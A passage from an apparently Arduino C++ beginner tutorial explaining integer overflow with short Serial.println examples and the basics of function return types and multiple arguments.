In fact, C ++ has the nasty habit of waiting for us to take care that we do not put a value that does not fit into a variable. When this happens it is called overflow, and C ++ completely ignores the issue, leading to problems difficult to detect if one does not walk gingerly.
Try this:
int i = 32767 ; Serial.println(i+1);
You see immediately that if i is equal to 32767 and we increase its value by 1, C ++ interprets it as a negative result. That is because C++ simply does not control overflow.
Let’s try also the following operation:
int i = 32767 ; Serial.println(2*i + 1);
According to Arduino, the result is -1.
- This is not a mistake, it was so decided. C ++ does not control overflows, so be very careful, because this kind of mistakes can be very difficult to detect.
MORE ON FUNCTIONS IN C++
When we declare a function we must specify which kind of data type returns. Let’s see some examples :
One function can return any data type defined in C++ but only a single value each time, if we use the return() statement . It is specifically not allowed to return more than one value. If this is required, there are other solutions that we will further see.
- We can deal with this problem by using global variables or passing values by reference. We will discuss it in further chapters.
What it is in fact allowed is to pass several arguments to a function:
int Function5 ( int x , String s , long y)
In this example we have declared a function, Function5(), that have three arguments: an integer, a String and a long, respectively.
Summary
- We have defined our own function to find out whether a number is prime.
- We have seen that the integer data type has a size limit.
- We have met data types with different ability to handle more or less large integer numbers, but all of them still have a size limit.
- Data type overflow is a key concept and should be taken into account when we work with integers.
- We have been playing with logical problems and we have seen some solutions that can help you find some of your own.
Give a Reply | http://prometec.org/starter-kit-course/functions-and-integers/ | CC-MAIN-2021-49 | refinedweb | 1,859 | 68.81 |
09 June 2011 16:09 [Source: ICIS news]
HOUSTON (ICIS)--Air Products intends to increase its growth by 11%–13% per year to achieve total revenues of $15bn (€10bn) in 2015, the US-based international industrial gases major said on Thursday.
The target compares with full-year sales of $9bn that Air Products recorded in its 2010 fiscal year.
CEO John McGlade said Air Products’ operating margin should improve by 300 basis points to 20% and its return on capital should increase by 150 basis points to 15% from 2011 to 2015.
The company would achieve the improvement through its strong positions in energy, environmental and emerging markets worldwide, he said.
Air Products' innovation, improvement and integration actions should allow the company to continue to lower its costs, improve returns and gain a greater competitive advantage over its peers, McGlade told investors at a conference in ?xml:namespace>
($1 = €0.69)
For more on Air | http://www.icis.com/Articles/2011/06/09/9468123/air-products-targets-revenues-of-15bn-per-year-by-2015-ceo.html | CC-MAIN-2014-10 | refinedweb | 155 | 58.52 |
See also: IRC log
saz: testCase and testRequirement
carlosi: requirement != test
saz/carlosi: should we allow multiple requirements in one assertion?
<JibberJim> I think test case and requirement is a good thing, I agree with carlos's emails.
<drooks> it may take several test cases to prove a requirement... hence an assertion should be allowed to have multiple test cases
<JibberJim> Yes shadi, that's what I meant, and we allow both
Carlos, jim: requirement <--> testcase is a many-to-many thing
RESOLUTION: testCase and testRequirement are distinct and should be both included
<shadi>
saz: earl for streaming contents?
jim: EARL doesn't need to do anything. We already allow people to define their own pointers into contents
<JibberJim> Yes
saz: nice to speel that out + example for earl
guide
... no meet next week; use mailinglist
<shadi> ci: about to propose additions to the schema
saz: one namespace for http?
jim: yes
CarlosI: possible ambiguity re: extension headers
nrk: http:request-this, http:response-that
... two-level namespace
saz: that looks like what johannes suggests
provisional resolution as above, but wait for johannes before firming it up? | http://www.w3.org/2006/02/01-er-minutes | CC-MAIN-2015-27 | refinedweb | 187 | 53.61 |
Java I/O Buffered Streams
Java I/O Buffered Streams
In this section we will discuss the I/O Buffered Streams.
In Java programming when we are doing an input and output operation... stream classes and the other twos are the buffered
character streams
I/O stream class.
I/O stream class. Explain the hierarchy of Java I/O stream class.
Hierarchy of Java I/O streams
Have a look at the following link:
Java I/O
Java I/O Examples
Streams
In this section we will discussed the I/O Byte Streams.
Java I/O Character Streams
In this section we will discuss the I/O Character Streams.
Java I/O Buffered Streams
In this section we
Java I/O From the Command Line
Java I/O From the Command Line
In this section we will learn about the I/O..., by default. There are three Standard Streams which are supported by the
Java... output streams which are the
character streams.
System.console() is used
This is a new feature added in Java SE 6, which has the ability to read... entry. The Console object provides input and output streams which is true character
i/o
i/o
Write a Java program to do the following:
a. Write into file the following information regarding the marks for 10 students in a test
i. Matric no
ii. Marks for question 1
iii. Marks for question 2
iv. Marks
I/O Java
I/O Java import java.io.File;
import java.io.FileNotFoundException...(File file) {
//if the file extension is .txt or .java return true, else false
if (file.getName().endsWith(".txt")||file.getName().endsWith(".java
Post your Comment | http://www.roseindia.net/discussion/46111-Java-I/O-Character-Streams.html | CC-MAIN-2014-41 | refinedweb | 278 | 76.52 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.